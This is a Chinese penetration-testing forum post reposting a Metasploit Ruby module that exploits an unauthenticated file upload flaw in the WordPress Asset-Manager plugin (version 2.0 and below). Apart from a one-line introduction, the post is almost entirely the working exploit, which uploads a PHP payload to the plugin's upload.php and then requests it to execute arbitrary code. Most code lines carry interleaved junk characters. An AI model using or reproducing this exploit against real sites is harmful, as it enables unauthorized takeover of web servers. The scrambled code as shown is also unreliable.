找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2001|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
7 U* c  R: f* G7 E7 t6 N5 r! Y
; {0 d  B% ~( j8 D& F0 W4 K##. V/ _' ]9 y+ f0 L9 Y
# This file is part of the Metasploit Framework and may be subject to
9 s* _% O( c; a4 }* d% T# redistribution and commercial restrictions. Please see the Metasploit
  w3 F, [) _, \9 o7 k1 K/ Y# Framework web site for more information on licensing and terms of use.' R. s2 @3 u$ @  D
#   http://metasploit.com/framework/" E4 ]# J( I, V& Y
##$ g& h) T% G8 F0 I9 E6 \  A

5 [- X6 U% e" o9 K7 R  hrequire 'msf/core'
! c' Z( i* \: ?, U; a: ?" Lrequire 'msf/core/exploit/php_exe'
) p- a1 E. a) v: ]! W
0 n1 W$ F* U# L% B# O. Q8 s# Rclass Metasploit3 < Msf::Exploit::Remote$ ~+ V; R  K8 R2 u. @; q
  Rank = ExcellentRanking
5 `9 T% z, m% s" K8 O- w; C  o1 S* A
! @# F7 D. T9 t/ X6 R1 }  include Msf::Exploit::Remote::HttpClient' T* u- X. o" q; Q6 a/ L
  include Msf::Exploit:hpEXE) a, k( A) O$ N3 M

& K+ V, |& s$ h( A* P6 y  def initialize(info = {})' O+ ]! d2 d( P5 d+ P% f* l1 e
    super(update_info(info,7 s5 ^# ~8 C. A1 {; K3 m! C
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
  }, v# K) _2 Z      'Description'    => %q{
0 S) O+ O9 v4 F$ b        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
9 Z7 p! C- O: `5 ]8 g/ X        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
# P2 x2 K1 W0 V2 ~) m# Q        temp directory without authentication, which results in arbitrary code execution.
. e5 y( e2 |( @7 V6 D& F  V& a% d      },
/ I. R" k" P; U' i  _      'Author'         =>" u5 l9 W' f, s" C- p) v
        [8 g! A% r' w& M! D
          'Sammy FORGIT', # initial discovery+ Z# B( R% |  @% x, g
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
2 [/ H. g% r! h* `/ n& G        ],
  X# f4 @3 i+ R6 P% V, I( @9 T      'License'        => MSF_LICENSE,
2 s. b1 C" a5 `% {0 X6 W0 [( z      'References'     =>
4 f1 q. y& W, T( H2 i        [
( v1 K1 n/ c2 m          [ 'OSVDB', '82653' ],7 S4 w. F0 B% j* E
          [ 'BID', '53809' ],7 Z8 k6 ]! e# P; \* x+ l
          [ 'EDB', '18993' ],9 Z& q( o: `8 n( r$ D
          [ 'URL', 'http:// www.myhack58.com /' ]
+ ^3 a# _& [. Y+ R; \        ],
/ U' c% A; d, D; O: f' J      'Payload'       =>  J* k6 m3 X0 \) a# O; p: Q6 r+ U
        {
; k, n9 x5 n( g  P  q          'BadChars' => "\x00",9 o8 Q8 _7 ^5 l6 _9 ~( H
        },8 g9 m: r5 M2 G: g) l4 v! Y
      'Platform'       => 'php',+ g5 D$ G2 y2 {6 h% w/ i9 G
      'Arch'           => ARCH_PHP,
) a8 P  N3 M+ {2 U      'Targets'        =>
1 A5 @* D2 S. s: d        [' z  k- p( ?# B0 j3 d
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
9 n1 ]4 {9 E7 @* f5 i  ~          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
0 y  v. H/ H4 X& g5 h        ],/ T4 A5 b6 n# N5 T% U  l8 a; _2 b# d
      'DefaultTarget' => 0,
) G9 [8 u% ~! @# e2 b% x      'DisclosureDate' => 'May 26 2012'))
: l# Y) _! ~0 {9 t" y4 P- s ' q% q& k0 r' z8 _# _/ A
    register_options(/ a  p+ H( N. g, m
      [/ O) p1 T& \3 |+ {8 A1 E
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])/ J4 ?; n$ T, [  H' g# @
      ], self.class)
/ `. K( k0 p) ^8 D0 y* @5 Q& R  end
) L# P8 B6 _: m0 U* I0 d   h: Z+ T) r& j" o8 {. c: g, y7 q
  def exploit
% o- s: o3 j4 [& a$ {3 b% i    uri =  target_uri.path
: @6 a. `0 Q7 g2 m+ ^0 O  U    uri << '/' if uri[-1,1] != '/'3 G. K) A3 ?6 S. G" [
    peer = "#{rhost}:#{rport}"1 H& ?7 E& s; a; ]' K+ \
    payload_name = "#{rand_text_alpha(5)}.php"9 G1 w9 X+ ^* v3 p# U) g+ [' [; l
    php_payload = get_write_exec_payload(:unlink_self=>true)
. g, q! G  Q1 x4 V. W/ \6 M
: r) A+ L, _0 }    data = Rex::MIME::Message.new0 X; c! `5 |5 t+ `
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")2 {4 m/ `9 L3 @& V
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
( b, o8 V" h. v6 i" Q+ u3 ^" s: D 3 Y% f$ M9 N% M
    print_status("#{peer} - Uploading payload #{payload_name}")
! c/ b, Q9 ?1 r6 c7 @    res = send_request_cgi({" c% J7 K* v$ E# ~" I- l; S# g
      'method'  => 'POST',
& J) I; U1 [+ q4 O8 w' v; ]/ t      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
4 O& ]8 V  T: E- }      'ctype'   => "multipart/form-data; boundary=#{data.bound}",! M; [: }3 v9 E5 a: m9 S8 m
      'data'    => post_data
6 P  q$ p0 p8 o* T2 j  k    })
1 N! |; U4 F3 S2 v: y/ e! c % I3 C; L; l, K+ N: l& K0 e
    if not res or res.code != 200 or res.body !~ /#{payload_name}/! E3 @& n3 e* ?% s; x, J
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")2 E* S9 A1 \! X/ c
end
; H' r" ]0 c; T" \/ ~% q7 Y0 a: n4 h5 W 2 \. y7 _0 X: m/ J, r" [
    print_status("#{peer} - Executing payload #{payload_name}")) F& k' r$ `6 ]3 P+ f
    res = send_request_raw({
1 E6 w5 U' ?$ j" y      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",& z, m. N8 `7 r8 E$ _; {# C
      'method'  => 'GET'( g4 I% G7 j: C0 h
    })
4 t4 j/ t) |# [, ^0 _, ^7 l % _3 u( ^0 k! K% ~, g
    if res and res.code != 200
6 D- R5 e1 L0 E) N- w; ]) Q' e      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")( |4 W/ q3 f' Y! ?3 w
    end
2 x. z7 m  R# \7 x0 m; z  end6 }+ q' b) Q2 T/ ]
end5 d' g8 Z. i2 P
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表